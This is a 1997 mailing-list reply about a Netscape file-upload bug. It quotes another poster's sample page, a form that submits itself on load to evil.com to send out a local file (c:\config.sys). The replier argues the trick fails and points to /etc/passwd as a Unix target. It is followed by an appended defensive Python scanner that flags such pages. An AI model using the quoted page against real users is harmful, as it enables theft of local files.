Re: Netscape Exploit

Justin C. Ferguson (jferg@ACM.ORG)
Sat, 14 Jun 1997 22:38:03 -0500

On Jun 14, you babbled something about:
> Here is a sample it isn't complete but you get the basic idea of what is
> going on

> <HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE></HEAD>
> <BODY onLoad="daForm.submit()">
> <FORM NAME="daForm" ACTION="http://evil.com/cgi-bin/formmail.pl" METHOD=POST>
> <INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your
> Harddrive">
> <INPUT TYPE=HIDDEN NAME="recipient" value="foobar@evil.com">

Unless I'm missing something here, this method _does_not_ work. This
was my first idea when I first heard about the bug as well, but from what I can
tell, it's not possible to set a value (or a defaultValue using JavaScript) for
a file type input. The only even remotely possible way I can see to do
this is perhaps through the fact that Netscape caches form data for reposts,
and some trick here regarding reloading the page. If anybody's interested in
viewing the page I set up yesterday that does almost exactly what is listed
above, it's at http://acm.cs.umr.edu/~jferg/test1.html. (Yes, I will
guarantee that I'm not grabbing anybody's files here...)
On a side note, is anyone else but me entertained by the fact that
Netscape claims this bug has "few real-world applications", since one must
know the exact name and path of the file, yet Unix systems are vulnerable?
I'm thinking...ummm.../etc/passwd? *shrugs*

JF

--
Justin Ferguson - jferg@acm.org - jferg@usgs.gov - http://acm.cs.umr.edu/~jferg
 "I will stare at the sun until its light doesn't blind me...I will walk into
  the fire until its heat doesn't burn me...and I will feed the fire.  And into
  the fire, I'm reunited, into the fire, I am the spark..." - Sarah McLachlan
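The pattern under discussion (a file-type input shipped with a preset VALUE inside a form that submits itself on load) is easy to recognise in page content, which is what a proxy or mail-gateway filter of the period would want to do. The following scanner is an added example, not code from either poster: it parses HTML with Python's standard html.parser, collects file inputs that carry a VALUE, notes any on* handler that calls submit(), and reports the combination. The two sample pages are constructed for illustration, with placeholder hosts and addresses.

```python
"""Detect auto-submitted forms that try to preset a file-type input.

Added example for the thread above; the two sample pages are constructed.
"""
import re
from html.parser import HTMLParser

# Any event-handler attribute whose script calls submit() counts as auto-submit.
SUBMIT_RE = re.compile(r"\bsubmit\s*\(", re.IGNORECASE)


class FileInputScanner(HTMLParser):
    """Collect <input type=file> elements with a preset value and on*=submit() handlers."""

    def __init__(self):
        super().__init__()
        self.preset_file_inputs = []  # (name, value) pairs for file inputs with VALUE set
        self.form_actions = []        # ACTION targets of every <form> seen
        self.auto_submit = False      # True once an on* handler calling submit() is seen

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names; values keep their case.
        a = {k: (v if v is not None else "") for k, v in attrs}
        if tag == "input" and a.get("type", "text").lower() == "file" and a.get("value"):
            self.preset_file_inputs.append((a.get("name", ""), a["value"]))
        if tag == "form":
            self.form_actions.append(a.get("action", ""))
        for k, v in a.items():
            if k.startswith("on") and SUBMIT_RE.search(v):
                self.auto_submit = True


def scan(html: str) -> dict:
    """Return what was found and whether the page matches the suspicious pattern."""
    p = FileInputScanner()
    p.feed(html)
    p.close()
    return {
        "preset_file_inputs": p.preset_file_inputs,
        "form_actions": p.form_actions,
        "auto_submit": p.auto_submit,
        # Both halves are needed: a preset file path AND a submit without user action.
        "suspicious": p.auto_submit and bool(p.preset_file_inputs),
    }


# Constructed sample mirroring the quoted page; hosts and addresses are placeholders.
SAMPLE_SUSPECT = r"""<HTML><HEAD><TITLE>test page</TITLE></HEAD>
<BODY onLoad="daForm.submit()">
<FORM NAME="daForm" ACTION="http://collector.example.invalid/cgi-bin/post.pl" METHOD=POST>
<INPUT TYPE=FILE VALUE="c:\config.sys" Name="upload">
<INPUT TYPE=HIDDEN NAME="recipient" value="someone@example.invalid">
</FORM></BODY></HTML>"""

# Constructed ordinary upload form: no preset value, submit only on user click.
SAMPLE_BENIGN = """<html><body>
<form action="/upload" method="post" enctype="multipart/form-data">
<input type="file" name="attachment">
<input type="submit" value="Send">
</form></body></html>"""


if __name__ == "__main__":
    for label, page in (("suspect", SAMPLE_SUSPECT), ("benign", SAMPLE_BENIGN)):
        print(label, scan(page))
```

The scanner deliberately treats the two signals separately: a preset VALUE on a file input is itself worth flagging even without auto-submit, since it only has a purpose if the browser honours it, while an on-load submit by itself is common on harmless redirect pages.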